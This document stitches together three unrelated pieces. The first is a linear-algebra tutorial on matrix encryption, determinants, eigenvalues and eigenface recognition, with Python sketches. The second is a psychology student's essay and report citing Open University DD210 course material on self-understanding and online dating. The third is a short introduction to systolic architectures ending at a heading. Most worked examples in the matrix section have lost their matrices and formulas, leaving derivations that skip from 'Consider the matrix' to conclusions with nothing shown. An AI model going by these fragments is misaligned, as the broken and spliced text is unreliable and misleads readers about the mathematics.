## History and Applications of Matrices

Matrices have many practical applications today. Physics makes use of matrices in various domains, for example in geometrical optics and matrix mechanics; the latter led to the detailed study of matrices with an infinite number of rows and columns. Graph theory uses matrices to keep track of distances between pairs of vertices in a graph. Computer graphics uses matrices to project three-dimensional space onto a two-dimensional screen.
Example Application
A message is converted into numeric form according to some scheme. The easiest scheme is to let space=0, A=1, B=2, …, Y=25, and Z=26. For example, the message “Red Rum” would become 18, 5, 4, 0, 18, 21, 13.
This data is then placed into matrix form. The size of the matrix depends on the size of the encryption key. Suppose our encryption matrix (encoding matrix) is a 2×2 matrix. Since there are seven pieces of data, they are placed into a 4×2 matrix, with the last spot filled by a space (0) to complete the matrix. Call the original, unencrypted data matrix A.

There is an invertible matrix which is called the encryption matrix or the encoding matrix. We’ll call it matrix B. Since this matrix needs to be invertible, it must be square.
The encoding matrix can really be anything; it is up to the person encrypting the message. I'll use this matrix.

The unencrypted data is then multiplied by our encoding matrix. The result of this multiplication is the matrix containing the encrypted data. We’ll call it matrix X.

The message that you would pass on to the other person is the stream of numbers 67, -21, 16, -8, 51, 27, 52, -26.
Decryption Process
Place the encrypted stream of numbers that represents an encrypted message into a matrix.
Multiply by the decoding matrix. The decoding matrix is the inverse of the encoding matrix.
Convert the matrix into a stream of numbers.
Convert the numbers into the text of the original message.
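The whole round trip above can be sketched in Python. The 2×2 encoding matrix B below was inferred from the example's number stream (it reproduces 67, -21, 16, -8, 51, 27, 52, -26); treat it as one possible key, not necessarily the exact matrix the original text displayed.

```python
import numpy as np

# space=0, A=1, B=2, ..., Z=26
def to_numbers(msg):
    return [0 if c == " " else ord(c.upper()) - ord("A") + 1 for c in msg]

def to_text(nums):
    return "".join(" " if n == 0 else chr(n + ord("A") - 1) for n in nums)

# Encoding matrix (assumed; must be invertible -- here det(B) = 10)
B = np.array([[4, -2],
              [-1, 3]])

msg = "Red Rum"
nums = to_numbers(msg)             # [18, 5, 4, 0, 18, 21, 13]
nums += [0] * (-len(nums) % 2)     # pad with a space to complete the matrix
A = np.array(nums).reshape(-1, 2)  # 4x2 unencrypted data matrix

X = A @ B                          # encrypted data matrix
stream = X.flatten().tolist()      # -> 67, -21, 16, -8, 51, 27, 52, -26

# Decryption: multiply by the inverse of the encoding matrix
A_back = np.rint(X @ np.linalg.inv(B)).astype(int)
plain = to_text(A_back.flatten().tolist()).rstrip()  # "RED RUM"
```

Because B is invertible, multiplying the encrypted matrix by B's inverse recovers the data matrix exactly, which is why the scheme insists on an invertible (hence square) key.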
DETERMINANTS
The determinant of a matrix A is denoted det(A), or without parentheses: det A. An alternative notation, used for compactness, especially in the case where the matrix entries are written out in full, is to denote the determinant of a matrix by surrounding the matrix entries by vertical bars instead of the usual brackets or parentheses.
For a fixed nonnegative integer n, there is a unique determinant function for the n×n matrices over any commutative ring R. In particular, this unique function exists when R is the field of real or complex numbers.
For any square matrix of order 2, we have found a necessary and sufficient condition for invertibility. Indeed, consider the matrix
Example. Evaluate
Let us transform this matrix into a triangular one through elementary operations. We will keep the first row and add to the second one the first multiplied by . We get
Using Property 2, we get
Therefore, we have
which one may check easily.
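The evaluation strategy just described (reduce the matrix to a triangular one with elementary row operations, then multiply the diagonal entries) can be sketched in Python. The 3×3 matrix at the end is purely illustrative, since the example's own matrix did not survive extraction.

```python
from fractions import Fraction

def det_by_elimination(M):
    """Determinant via reduction to an upper-triangular matrix.

    Adding a multiple of one row to another leaves the determinant
    unchanged, so after elimination det(M) is the product of the
    diagonal entries, with a sign flip for each row swap."""
    A = [[Fraction(x) for x in row] for row in M]
    n, sign = len(A), 1
    for i in range(n):
        if A[i][i] == 0:                    # swap in a nonzero pivot
            for j in range(i + 1, n):
                if A[j][i] != 0:
                    A[i], A[j] = A[j], A[i]
                    sign = -sign
                    break
            else:
                return Fraction(0)          # whole column is zero
        for j in range(i + 1, n):
            factor = A[j][i] / A[i][i]
            A[j] = [a - factor * b for a, b in zip(A[j], A[i])]
    prod = Fraction(sign)
    for i in range(n):
        prod *= A[i][i]
    return prod

# Illustrative 3x3 matrix (not the one from the worked example)
M = [[2, 1, 3],
     [4, 1, 7],
     [2, 5, 8]]
print(det_by_elimination(M))  # -18, matching cofactor expansion
```

Exact `Fraction` arithmetic is used so the triangular form has no rounding error; for large matrices one would use floating point with partial pivoting instead.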
EIGENVALUES AND EIGENVECTORS
In mathematics, eigenvalue, eigenvector, and eigenspace are related concepts in the field of linear algebra. The prefix eigen- is adopted from the German word “eigen” for “innate”, “idiosyncratic”, “own”. Linear algebra studies linear transformations, which are represented by matrices acting on vectors. Eigenvalues, eigenvectors and eigenspaces are properties of a matrix. They are computed by a method described below, give important information about the matrix, and can be used in matrix factorization. They have applications in areas of applied mathematics as diverse as economics and quantum mechanics.


In general, a matrix acts on a vector by changing both its magnitude and its direction. However, a matrix may act on certain vectors by changing only their magnitude, and leaving their direction unchanged (or possibly reversing it). These vectors are the eigenvectors of the matrix. A matrix acts on an eigenvector by multiplying its magnitude by a factor, which is positive if its direction is unchanged and negative if its direction is reversed. This factor is the eigenvalue associated with that eigenvector. An eigenspace is the set of all eigenvectors that have the same eigenvalue, together with the zero vector.
These concepts are formally defined in the language of matrices and linear transformations. Formally, if A is a linear transformation, a non-null vector x is an eigenvector of A if there is a scalar λ such that Ax = λx.
The scalar λ is said to be an eigenvalue of A corresponding to the eigenvector x.
Eigenvalues and Eigenvectors: An Introduction
The eigenvalue problem is a problem of considerable theoretical interest and wide-ranging application. For example, it is crucial in solving systems of differential equations, analyzing population growth models, and calculating powers of matrices (in order to define the exponential matrix). Other areas such as physics, sociology, biology, economics and statistics have focused considerable attention on eigenvalues and eigenvectors: their applications and their computations. Before we give the formal definition, let us introduce these concepts with an example.
Example.
Consider the matrix
Consider the three column matrices
We have
In other words, we have
Next consider the matrix P for which the columns are C1, C2, and C3, i.e.,
We have det(P) = 84. So this matrix is invertible. Easy calculations give
Next we evaluate the matrix P^-1 A P. We leave the details to the reader to check that we have
In other words, we have
Using the matrix multiplication, we obtain
which implies that A is similar to a diagonal matrix. In particular, we have
for . Note that it is almost impossible to find A^75 directly from the original form of A.
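The diagonalization trick described above can be reproduced numerically. Since the example's matrices did not survive here, the 2×2 matrix A below is an illustrative stand-in (its eigenvalues are 2 and 5); it only demonstrates that P^-1 A P is diagonal and that high powers follow cheaply from A^n = P D^n P^-1.

```python
import numpy as np

# Stand-in matrix (the essay's own example was lost); eigenvalues are 2 and 5
A = np.array([[4., 1.],
              [2., 3.]])

eigvals, P = np.linalg.eig(A)        # columns of P are eigenvectors
D = np.diag(eigvals)

# P^-1 A P is diagonal, so A is similar to a diagonal matrix ...
assert np.allclose(np.linalg.inv(P) @ A @ P, D)

# ... and high powers are cheap: A^n = P D^n P^-1
n = 10
A_n = P @ np.diag(eigvals ** n) @ np.linalg.inv(P)
assert np.allclose(A_n, np.linalg.matrix_power(A, n))
```

Raising the diagonal matrix to a power just raises each eigenvalue to that power, which is exactly why a power like A^75 becomes tractable once A is diagonalized.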
This example is so rich in conclusions that many questions impose themselves in a natural way. For example, given a square matrix A, how do we find column matrices which behave like the ones above? In other words, how do we find the column matrices which will help build an invertible matrix P such that P^-1 A P is a diagonal matrix?
From now on, we will call column matrices vectors. So the above column matrices C1, C2, and C3 are now vectors. We have the following definition.
Definition. Let A be a square matrix. A non-zero vector C is called an eigenvector of A if and only if there exists a number λ (real or complex) such that AC = λC.
If such a number λ exists, it is called an eigenvalue of A. The vector C is called an eigenvector associated to the eigenvalue λ.
Remark. The eigenvector C must be non-zero, since A·0 = λ·0 = 0 holds for any number λ, so the zero vector would otherwise be an "eigenvector" for every λ.
Example. Consider the matrix
We have seen that
where
So C1 is an eigenvector of A associated to the eigenvalue 0. C2 is an eigenvector of A associated to the eigenvalue -4 while C3 is an eigenvector of A associated to the eigenvalue 3.
It may be interesting to know whether we found all the eigenvalues of A in the above example. On the next page, we will discuss this question as well as how to find the eigenvalues of a square matrix.
PROOFS OF PROPERTIES OF EIGENVALUES
PROPERTY 1
The inverse of a matrix A exists if and only if zero is not an eigenvalue of A.
Suppose A is a square matrix. Then A is singular if and only if λ = 0 is an eigenvalue of A.
Proof. We have the following equivalences:
A is singular
⇔ there exists x ≠ 0 such that Ax = 0
⇔ there exists x ≠ 0 such that Ax = 0x
⇔ λ = 0 is an eigenvalue of A
Since a singular matrix has 0 as an eigenvalue, and a singular matrix has no inverse, it follows that a matrix is invertible if and only if all of its eigenvalues are non-zero.
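Property 1 can be checked numerically on small illustrative matrices (my own choices below): a singular matrix has 0 among its eigenvalues, while a matrix whose eigenvalues are all nonzero has an inverse.

```python
import numpy as np

singular = np.array([[1., 2.],
                     [2., 4.]])      # rows are dependent, det = 0
invertible = np.array([[1., 2.],
                       [3., 4.]])    # det = -2

# A singular matrix has 0 as an eigenvalue ...
assert np.any(np.isclose(np.linalg.eigvals(singular), 0))

# ... while a matrix with only nonzero eigenvalues is invertible
assert not np.any(np.isclose(np.linalg.eigvals(invertible), 0))
np.linalg.inv(invertible)            # succeeds: no exception raised
```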
PROPERTY 2
The eigenvalues of a real matrix are real or occur in complex-conjugate pairs.
Suppose A is a square matrix with real entries and x is an eigenvector of A for the eigenvalue λ. Then conj(x) is an eigenvector of A for the eigenvalue conj(λ). □
Proof. Write conj(·) for entrywise complex conjugation. Then
A·conj(x) = conj(A)·conj(x)   (A has real entries, so conj(A) = A)
= conj(Ax)   (conjugation commutes with matrix multiplication)
= conj(λx)   (x is an eigenvector of A for λ)
= conj(λ)·conj(x)
Lemma. Suppose A is an m×n matrix and B is an n×p matrix. Then conj(AB) = conj(A)·conj(B). □
Proof. To obtain this matrix equality, we work entry by entry. For 1 ≤ i ≤ m and 1 ≤ j ≤ p,
[conj(AB)]ij = conj([AB]ij) = conj(∑_{k=1}^{n} Aik·Bkj) = ∑_{k=1}^{n} conj(Aik·Bkj) = ∑_{k=1}^{n} conj(Aik)·conj(Bkj) = [conj(A)·conj(B)]ij
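Property 2 can be illustrated numerically with a real matrix whose eigenvalues are the conjugate pair ±i (the matrix below is my own illustrative choice, a 90° rotation):

```python
import numpy as np

A = np.array([[0., -1.],
              [1.,  0.]])            # real matrix with eigenvalues +i and -i

eigvals, eigvecs = np.linalg.eig(A)

# The complex eigenvalues occur as a conjugate pair
assert np.isclose(eigvals[0], np.conj(eigvals[1]))

# If x is an eigenvector for lambda, then conj(x) is one for conj(lambda)
x, lam = eigvecs[:, 0], eigvals[0]
assert np.allclose(A @ np.conj(x), np.conj(lam) * np.conj(x))
```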
APPLICATION OF EIGENVALUES IN FACIAL RECOGNITION
How does it work?
The task of facial recognition is to discriminate input signals (image data) into several classes (persons). The input signals are highly noisy (e.g. noise caused by differing lighting conditions, pose, etc.), yet the input images are not completely random, and in spite of their differences there are patterns that occur in every input signal. In the domain of facial recognition, such patterns are the presence of certain objects (eyes, nose, mouth) in any face, as well as the relative distances between these objects. These characteristic features are called eigenfaces in the facial recognition domain (or principal components more generally). They can be extracted from the original image data by means of a mathematical tool called Principal Component Analysis (PCA).
By means of PCA one can transform each original image of the training set into a corresponding eigenface. An important feature of PCA is that one can reconstruct any original image from the training set by combining the eigenfaces. Remember that eigenfaces are nothing less than characteristic features of the faces. Therefore one could say that an original face image can be reconstructed from eigenfaces if one adds up all the eigenfaces (features) in the right proportion. Each eigenface represents only certain features of the face, which may or may not be present in the original image. If a feature is present in the original image to a higher degree, the share of the corresponding eigenface in the "sum" of the eigenfaces should be greater. If, on the contrary, the particular feature is absent (or almost absent) from the original image, the corresponding eigenface should contribute a smaller part (or none at all) to the sum of eigenfaces. So, to reconstruct the original image from the eigenfaces, one builds a weighted sum of all eigenfaces: the reconstructed image equals the sum of all eigenfaces, each with a certain weight, and that weight specifies to what degree the specific feature (eigenface) is present in the original image.
If one uses all the eigenfaces extracted from the original images, one can reconstruct the original images exactly. But one can also use only some of the eigenfaces; the reconstructed image is then an approximation of the original. The losses due to omitting some of the eigenfaces can be minimized by keeping only the most important features (eigenfaces). Omitting eigenfaces is necessary because computational resources are limited.
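The extract/weight/reconstruct pipeline described above can be sketched with a bare-bones PCA in NumPy. The "images" here are random vectors, purely for illustration; a real eigenface system applies exactly the same steps to mean-centred pixel vectors of face photographs.

```python
import numpy as np

rng = np.random.default_rng(0)
faces = rng.random((10, 64))             # 10 training "images", 8x8 = 64 pixels each

mean = faces.mean(axis=0)
centred = faces - mean

# Eigenfaces = principal components of the (centred) training set
U, S, Vt = np.linalg.svd(centred, full_matrices=False)
eigenfaces = Vt                          # rows are eigenfaces

# Weights: how strongly each eigenface is present in each image
weights = centred @ eigenfaces.T

# Using all eigenfaces reconstructs the originals exactly ...
exact = mean + weights @ eigenfaces
assert np.allclose(exact, faces)

# ... while keeping only the k most important ones gives an approximation
k = 4
approx = mean + weights[:, :k] @ eigenfaces[:k]
err = np.linalg.norm(approx - faces)     # small but nonzero reconstruction loss
assert err > 0
```

Recognition then works on the weight vectors rather than the raw pixels: images whose weights lie close together are likely to show similar faces.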
How does this relate to facial recognition? The key is that it is possible not only to reconstruct a face from the eigenfaces given a set of weights, but also to go the opposite way: to extract the weights from the eigenfaces and the face to be recognized. These weights tell nothing less than the amount by which the face in question differs from the "typical" faces represented by the eigenfaces. Therefore, using these weights one can determine two important things:
Whether the image in question is a face at all. If the weights of the image differ too much from the weights of known face images (i.e. images we know for sure are faces), the image probably is not a face.
Similar faces (images) possess similar features (eigenfaces) to similar degrees (weights). If one extracts weights from all the images available, the images can be grouped into clusters: all images having similar weights are likely to be similar faces.

## Real-World Applications of Psychological Theories

‘Psychological theory and research into how people understand themselves and others has important real-world applications.’ Evaluate this claim, drawing upon examples of research from across the module to support your answer.

This essay will evaluate research from across this module that shows how psychological theories about the way people understand themselves and others have important real-world applications. Examples are drawn from multiple blocks of the module in support of this claim. The essay will also consider whether psychology can be mistaken: the discipline is valuable, but it holds its own restrictions.


How do we understand ourselves and others in the real world? One example from Block 1 is mind reading, known as theory of mind. Many people automatically associate the term mind reading with psychics and mystics, known as extraordinary mindreading (Hewson, 2015). In a sense, however, people mind read all the time as they interact with others on a regular basis. This is mind reading in real-world application: people attribute mental states to others in order to interpret their actions in terms of such states, including beliefs, desires, goals, ambitions and emotions. Psychologists have therefore used the term ‘mindreading’ to refer to a basic capability underpinning people’s social relations with others (Hewson, 2018).

Psychologists are very interested in using their knowledge in the real world. In addition, investigating conditions such as autism and psychopathy provides useful theoretical insights into the human mind; in the case of autism, this work has focused on helping to develop the ability of those with ASD to interact with others in order to improve their quality of life (Hewson and Turner, 2018a). One project reviewing methods to teach autistic children mindreading skills involved a computer game initially intended to teach both emotion recognition and emotion expression; however, there was inadequate research data on emotion expression, so the game could not be developed in that way. This demonstrates the essential role of research findings and theories in informing real-world interventions. Such research is central to developing interventions that can be effective and useful in helping individuals with conditions such as autism (Hewson and Turner, 2018b). This basic ability is an essential element of human social interaction: for most people, ‘mindreading’ skills are used spontaneously and naturally, without a great deal of conscious thought or reflection, except perhaps in challenging situations such as conflict with others (Hewson and Turner, 2018c).

Furthermore, when dealing with such challenging situations, theories of relationship conflict can be considered at three different levels: internal individual experience, interpersonal dynamics and sociocultural messages. None of these theories may be the single right way or the best insight, but psychologists have studied conflict in different ways, and all of them have something to offer our understanding of this complicated area. By examining the social rules people have absorbed, the history of people’s relationships with each other, their self-concept and the things they value, the anger that can be experienced, and the ways their thought processes and memories work, a more in-depth understanding of what is taking place can be built (Barker, 2018a). However, it is important to remember that tensions exist between the different theories: the existential approach sees conflict as an unavoidable part of human relationships; the sociocultural approach maintains that the way relationships are constructed almost draws them towards conflict; and another explanation sees conflict as the consequence of the internal cognitive biases all people have. The sociocultural approach also places the foundation of conflict within social messages, suggesting that people would not experience conflict in the ways they currently do if social standards did not deter them from admitting when they are in the wrong (Barker, 2018b).
Different cultures, social classes and communities have also been observed to have dissimilar ways of connecting and interacting, which may look like conflict to outsiders. This leads on to the expectations attached to specific sorts of relationships, which make people more prone to self-justification or objectification, and in turn to considering how people’s identities are bound up in the wider social context of their nationalities (Barker, 2015).

Having reflected on the impact of social relationships in everyday life, the focus turns to nations, an important source of identification for people. Nations are described as constructed categories of belonging: they are not ‘natural’ communities but socially and historically constructed, ‘imagined’ communities, as Benedict Anderson (1983) has famously argued. Within psychology, the social constructionist approach to understanding nations has three focus areas. The first is variability: people or groups with different positions and interests may develop different understandings of their nation. The second is change and debate: the meanings of national identities can be the subject of debate, as individuals or groups argue for their own understanding of national identity, which means those meanings are open to challenge and can change. The third is the functions of different ways of constructing the nation: social constructionist research is interested, for example, in who is included and excluded in different versions of the nation (Andreouli, 2018a). It is therefore suggested that nations and national identities are socially constructed, open to dispute and likely to change.

If identities are socially constructed, and therefore open to dispute and likely to change, this raises subjects such as sexuality and the questions around sex.

Having already focused on the relationship between people’s experience of the world and the way they show their understanding of it, psychological research and theory on sex and sexuality is relevant across a number of applied fields. For example, it is useful for sex educators to know how sexual awareness and understanding develop during key periods such as childhood and puberty. Criminal and forensic psychologists likewise need to know about criminal sexual behaviour: within real-world forensic practice, there need to be ideas about when and why sexual violence occurs and about how to prevent it or treat those who commit sexual offences. Psychological study in this area is also applied more broadly, with victims and perpetrators as well as the general population (Barker, 2018c).

The richness and diversity of this subject can also be seen in the online world, which keeps evolving to meet the demands of its users and offers variety and opportunity (Fox-Hamilton and Fullwood, 2018a). Some of the internet’s features encourage negative behaviours, including online aggression, trolling, flaming and cyberbullying; in contrast, the internet also has positives that have been shown to improve and add value to people’s lives. On reflection, it is not really possible to judge whether the internet is ‘good’ or ‘bad’, and trying to do so is not useful, because it opens up possibilities for many people at the same time as introducing difficulties for others. Among its positives, and its known capacity to increase psychological well-being, the internet can promote and support minority or disadvantaged groups, providing a sense of belonging, for example, for those with disabilities and those within the LGBT community (Fox-Hamilton and Fullwood, 2018b).

As well as support being found online, there is also the suggestion of self-help. Considering the relationship between psychology and self-help, for as long as psychology has existed as a discipline there has also been a market for self-help books and other materials directing people on how to change their lives for the better through numerous approaches; these strategies seem to belong to the world of psychology but are often not actually based on any psychological research or ideas. In the last couple of decades, psychologists have started to investigate the self-help literature to find out what it can tell us about popular cultural views of psychological matters, including mental health problems, relationships and decision-making, and in turn how people’s understandings shape their experiences and how their self-experience influences their understandings. The main aim is to improve people’s experiences by giving them a better understanding of how the self works psychologically. Attempts to change people’s cognitive preferences so that they become more ‘mindful’, and able to understand the role of sociocultural messages in times of difficulty, are more rooted in research on people’s actual experiences, and so could be regarded as one way of drawing on experience to improve understanding of the self in the real world (Barker, 2018d).

These psychological ideas and concepts show how psychologists have explored the relationship between people and their environments, and how the knowledge gained has been applied in the real world. Psychology can get theories wrong in real-world application; however, research is often generated in response to cultural issues as they arise, and psychologists constantly look back at research to aid development. Psychology is everywhere in human life: there are aspects of human life that might be expected to belong to a different discipline but are shared with psychology. Living psychology makes psychology a fundamental part of how you live your life, in particular how you think about yourself, the world and others. Every human has a brain shaped by evolutionary pressures; however, much of what has been identified applies differently to different people, or to the same person at different stages of their life. A key aspect of psychology as a discipline is the gathering of individual experiences and the attempt to make sense of them; living psychology is something everyone does every day, in the everyday and the extraordinary (Turner, 2015). In conclusion, psychology makes a remarkable contribution, although it has its limits; it is a work in progress.

References

Part 1:

Andreouli, E. (2018a) ’3 The social construction of nations’, DD210 Week 10: Nations and immigration [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303171&section=3 (accessed 22 May 2019)

Barker, M.J. (2018a) ’2.1 Theories of relationship conflict’, DD210 Week 8: Conflict in close relationships [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303169&section=2.1 (accessed 22 May 2019)

Barker, M.J. (2018b) ’6 Considering the theories together’, DD210 Week 8: Conflict in close relationships [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303169&section=6 (accessed 22 May 2019)

Barker, M.J. (2018c) ’4 Applying the psychology of sex and sexuality’, DD210 Week 24: Sex and sexuality [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303191&section=4 (accessed 22 May 2019)

Barker, M.J. (2018d) ’1 Introduction’, DD210 Week 26: Self-help – changing people’s understanding to change their experience [online] available at https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303193 (accessed 22 May 2019)

Barker, M.J. (2015) ‘Conflict in close relationships’ in Turner, J., Hewson, C., Mahendran, K. and Stevens, P. (eds) Living psychology: From the everyday life to the extraordinary, Book 1, Milton Keynes, The Open University, p. 233

Fox-Hamilton, N. and Fullwood, C. (2018a) ‘3 Everyday perspectives 1: Engaging online’, DD210 Week 25: Living online [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303192&section=3 (accessed 22 May 2019)

Fox-Hamilton, N. and Fullwood, C. (2018b) ‘7 The positive net: Online support’, DD210 Week 25: Living online [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303192&section=7 (accessed 22 May 2019)

Hewson, C. (2015) ‘Mindreading’ in Turner, J., Hewson, C., Mahendran, K. and Stevens, P. (eds) Living psychology: From the everyday life to the extraordinary, Book 1, Milton Keynes, The Open University, pp. 21-22

Hewson, C. (2018) ‘3 Everyday mindreading’, DD210 Week 2: Mindreading [online] available at https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303161&section=3 (accessed 22 May 2019)

Hewson, C. and Turner, J. (2018a) ‘9 Applications in the real world’, DD210 Week 4: Mindreading difficulties - examples from clinical psychology [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303163&section=9 (accessed 22 May 2019)

Hewson, C. and Turner, J. (2018b) ’10.3 Autism intervention research: the Camp Exploration project’, DD210 Week 4: Mindreading difficulties - examples from clinical psychology [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303163&section=10.3 (accessed 22 May 2019)

Hewson, C. and Turner, J. (2018c) ‘2 Mindreading difficulties’, DD210 Week 4: Mindreading difficulties - examples from clinical psychology [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303163&section=2 (accessed 22 May 2019)

Turner, J. (2015) ‘Conclusion’ in Turner, J., Hewson, C., Mahendran, K. and Stevens, P. (eds) Living psychology: From the everyday life to the extraordinary, Book 2, Milton Keynes, The Open University, pp. 267-272

Part 2: Report

Write a brief report relevant to the areas identified in the scenario provided.

Psychological theory of online communication and creativity

for over-30s online dating

Introduction :

This report will discuss whether this creative idea will work, looking at the online medium and the psychological aspects relevant to the online dating scene, at innovative ways in which people can interact on dating websites, and at the factors behind creativity, in order to understand both the idea and the future customer. Given the experience of the CEO and directors and their own use of dating websites, it should be possible to ensure that the new website is grounded in the online medium and in a deeper understanding of the psychological aspects relevant to the dating context; the methods and findings below support these aims.

Understanding online communication :

It is understood that internet access improves the living conditions of nations, and this has led to several initiatives to mend the ‘digital divide’, the disproportionate lack of access to the internet among disadvantaged groups such as the elderly (Fox-Hamilton and Fullwood, 2018a). The online world keeps growing, particularly to meet the demands of its users, and it offers a huge variety of opportunities. There are, and always will be, specific activities people engage with online, depending on their personalities and social perspectives (Fox-Hamilton and Fullwood, 2018b).

Approaches to creativity :

Psychologists who have studied creativity have emphasised the mental processes involved in a task, for example creative problem solving; however, social psychologists have challenged this focus on the individual perspective, suggesting that creativity is ‘made’ rather than automatically ‘born’ and that interpersonal relationships are critical to it. There are two definitions of creativity: an operational definition, by which creativity can be observed and measured for research purposes, and a theoretical definition, which explains the operational one. Each has different implications for how creativity can be evaluated (Taylor and Turner, 2018a).

Furthermore, using examples given by Amabile (1983), cited in Taylor and Turner (2018b): if you want to know whether a piece of work is creative, just ask someone; better yet, ask a number of people skilled enough in the field to make that assessment and see whether they think the output is creative. Creativity is not just about what needs to be done but also about knowing how to do it. Problem solving entails creativity, as does discovering what the problem is that needs to be solved. The task at hand may be algorithmic, meaning it can be solved by following a clear path or set of rules, or heuristic, meaning the resolution has to be invented to deal with the problem because no answer already exists (Taylor and Turner, 2018c).

Perceptions:

A psychological aspect relevant to an online dating context and understanding the future customer.

As explained, some people are concerned with how other people perceive them. McKenna and colleagues (2002), cited in Fox-Hamilton and Fullwood (2018c), note at least four ways in which internet communication differs from face-to-face communication:

People do not have to reveal their identity to others online

Within dating sites there is a tendency to want to see the other person; with such a specific audience for the chosen age group, there is a possibility to lean more towards psychological personality testing, matching personalities before looks.

There is a reduction in the importance of the individual’s physical appearance online compared to offline

There is no pressure to look your absolute best when ‘dating’ online; it can be done in the comfort of your own home, at work, or even sitting on public transport after the gym.

There is a level of control over the time you put in and the pace you can move at: compared to face-to-face communication, people can take their time to carefully consider what they are saying and edit messages before sending.

In this case it could be something as simple as setting up a bio for people to really get to know each other and break down barriers; there does not have to be any forced conversation or awkward pauses.

It is easier online than offline for people to find connections with similar others, such as someone who understands or fully appreciates a rare disorder.

Online, this can be disclosed early on or, if preferred, after waiting to connect with someone, in order to feel more open.

Self-presentations and Online Support :

When it comes to online self-presentation there are many things to consider; the internet is not a uniform entity, which may lead people to feel they have more control over their self-presentation. Those using this dating site need to be reminded that self-presentation has implications not only for how others perceive a person but for how the person views themselves; the site needs to feed into people’s self-worth (Fox-Hamilton and Fullwood, 2018d). There are negative experiences online, which is where support comes in: the positive aspects of the internet have been shown to improve and add value to people’s lives, and the internet, along with this site, can encourage and empower minority groups and provide a feeling of belonging (Fox-Hamilton and Fullwood, 2018e).

Conclusions:

Online dating is growing, and as many people evolve and create important personal relationships through it, it is important to understand how people act in and perceive these relationships. This sits alongside an understanding of online communication and how it has improved living conditions, its growth and available opportunities, as well as creativity. For example, if you want to know whether a piece of work is creative, ask someone, or a number of people, who are skilled enough, and see what they think. Remember, being creative is not just about knowing what needs to be done but also how it needs to be done. Keep in mind perceptions of self and others, leading on to self-presentation and the support that can be, and is, provided.

Recommendations :

Skills needed for creativity in the workplace:

Domain-relevant skills - the knowledge and technical abilities belonging to a specific field or area.

Creativity-relevant skills - more general: finding a way to complete a task. People can be taught problem-solving skills, and also how to approach tasks in a creative way; 'make the familiar strange' (Gordan, 1961, cited in Taylor and Turner, 2018d).

Having motivation is also essential:

Intrinsic - motivation from a personal view, consisting of a person's interests and experiences.

Extrinsic - an external goal: wanting to achieve what has been set out (Taylor and Turner, 2018e).

Working together, a pair or a group can merge into a unit that becomes a source of new creative outputs. Working together can help share the workload and provide help and support to one another; two heads are better than one, and different skills can combine and encourage new ways of thinking (Taylor and Turner, 2018f).


References

Part 2:

Fox-Hamilton, N. and Fullwood, C. (2018a) '2 The Internet and Its Importance', DD210 Week 25: Living Online [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303192&section=2 (accessed 21 May 2019)

Fox-Hamilton, N. and Fullwood, C. (2018b) '3 Everyday Perspectives 1: Engaging online', DD210 Week 25: Living Online [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303192&section=3 (accessed 21 May 2019)

Fox-Hamilton, N. and Fullwood, C. (2018c) '5.1 How is the internet different from face-to-face communication', DD210 Week 25: Living Online [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303192&section=5.1 (accessed 21 May 2019)

Fox-Hamilton, N. and Fullwood, C. (2018d) '5.2 The online environment and self-presentation', DD210 Week 25: Living Online [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303192&section=5.2 (accessed 21 May 2019)

Fox-Hamilton, N. and Fullwood, C. (2018e) '7 The positive net: Online support', DD210 Week 25: Living Online [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303192&section=7 (accessed 21 May 2019)

Turner, J. and Taylor, S. (2018a) '3 How can creativity be evaluated?', DD210 Week 9: Relationships and creativity [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303170&section=3 (accessed 26 May 2019)

Turner, J. and Taylor, S. (2018b) '3.1 An operational definition of creativity', DD210 Week 9: Relationships and creativity [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303170&section=3.1 (accessed 26 May 2019)

Turner, J. and Taylor, S. (2018c) '3.2 A theoretical definition of creativity', DD210 Week 9: Relationships and creativity [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303170&section=3.2 (accessed 26 May 2019)

Turner, J. and Taylor, S. (2018d) '4.1 The skills necessary for creativity', DD210 Week 9: Relationships and creativity [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303170&section=4.1 (accessed 26 May 2019)

Turner, J. and Taylor, S. (2018e) '4.2 The motivation for creativity', DD210 Week 9: Relationships and creativity [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303170&section=4.2 (accessed 26 May 2019)

Turner, J. and Taylor, S. (2018f) '5 Framework 2: creative collaborations', DD210 Week 9: Relationships and creativity [online] available at

https://learn2.open.ac.uk/mod/oucontent/view.php?id=1303170&section=5 (accessed 26 May 2019)

## Systolic Architecture: History and Applications

A network of PEs that rhythmically produce and pass data through the system is called a systolic architecture. It is used as a coprocessor in combination with a host computer, and its behaviour is analogous to the flow of blood through the heart; hence the name SYSTOLIC.
· A systolic architecture has the following characteristics:

A massive and non-centralised parallelism
Local communications
Synchronous evaluation

· Examples of systolic networks:
1. Linear network
2. Bi-dimensional network
3. Hexagonal network
HISTORY:-
The systolic architecture paradigm, data-stream-driven by data counters, is the counterpart of the von Neumann paradigm, instruction-stream-driven by a program counter. Because a systolic architecture usually sends and receives multiple data streams, and multiple data counters are needed to generate these data streams, it supports data parallelism. The name derives from analogy with the regular pumping of blood by the heart.
H. T. Kung and Charles E. Leiserson published the first paper describing systolic arrays in 1978; however, the first machine known to have used a similar technique was the Colossus Mark II in 1944.
NEED FOR SYSTOLIC ARCHITECTURE:-
